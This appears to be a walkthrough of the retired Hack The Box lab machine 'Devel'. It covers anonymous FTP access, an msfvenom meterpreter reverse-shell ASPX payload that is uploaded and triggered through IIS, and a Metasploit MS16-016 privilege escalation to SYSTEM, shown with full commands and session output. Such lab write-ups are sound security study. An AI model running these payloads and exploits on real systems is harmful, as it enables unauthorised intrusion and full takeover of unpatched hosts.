Devel # ENUMERATION ''' NMAP - 21/tcp open ftp syn-ack Microsoft ftpd - 80/tcp open http syn-ack Microsoft IIS httpd 7.5 ''' # EXPLOIT FTP - anonymous login kali@kali:~/HTB/RETIRED/Devel$ ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:kali): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. # EXPLOIT - create file msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx > devel_reverse.aspx PUT - introduce a file to the system ftp> put ./devel_reverse.asp local: ./devel_reverse.asp remote: ./devel_reverse.asp 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 38290 bytes sent in 0.00 secs (186.3071 MB/s) # METASPLOIT - set up handler msf5 payload(windows/meterpreter/reverse_tcp) > use multi/handler - set LHOST to Tun0 - set LPORT to 4444 (or whatever you want) - run the handler # WEBPAGE - run the explit in a browser http://10.10.10.5/devel_reverse.aspx - the reverse shell should show up in metasploit [*] Started reverse TCP handler on 10.10.14.27:4444 [*] Sending stage (176195 bytes) to 10.10.10.5 [*] Meterpreter session 2 opened (10.10.14.27:4444 -> 10.10.10.5:49158) at 2020-07-19 23:39:58 -0400 meterpreter > sysinfo Computer : DEVEL OS : Windows 7 (6.1 Build 7600). Architecture : x86 System Language : el_GR Domain : HTB Logged On Users : 0 Meterpreter : x86/windows meterpreter > getuid Server username: IIS APPPOOL\Web # METASPLOIT - send the session to background so you can use it for other exploits meterpreter > background # ENUMERATION - find ways to privilege escalate - upload and run WinPEAS.bat MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys) No Instance(s) Available. MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) No Instance(s) Available. MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) No Instance(s) Available. MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri) - (tere were many more exploits in this list) # METASPLOIT - search for each vulnerability, and try them msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > search 16-016 - try more than one exploit, but search for more and try them too... - others failed, but MS16-016 succeeded after a few attempts - make sure to set a session number for each attempt msf5 exploit(windows/local/ms16_016_webdav) > set session 2 # PWND msf5 exploit(windows/local/ms16_016_webdav) > run [*] Started reverse TCP handler on 10.10.14.27:4444 [*] Launching notepad to host the exploit... [*] Sending stage (176195 bytes) to 10.10.10.5 [+] Process 3168 launched. [*] Reflectively injecting the exploit DLL into 3168... [*] Meterpreter session 3 opened (10.10.14.27:4444 -> 10.10.10.5:49170) at 2020-07-19 23:47:12 -0400 [*] Exploit injected ... injecting payload into 3168... [*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM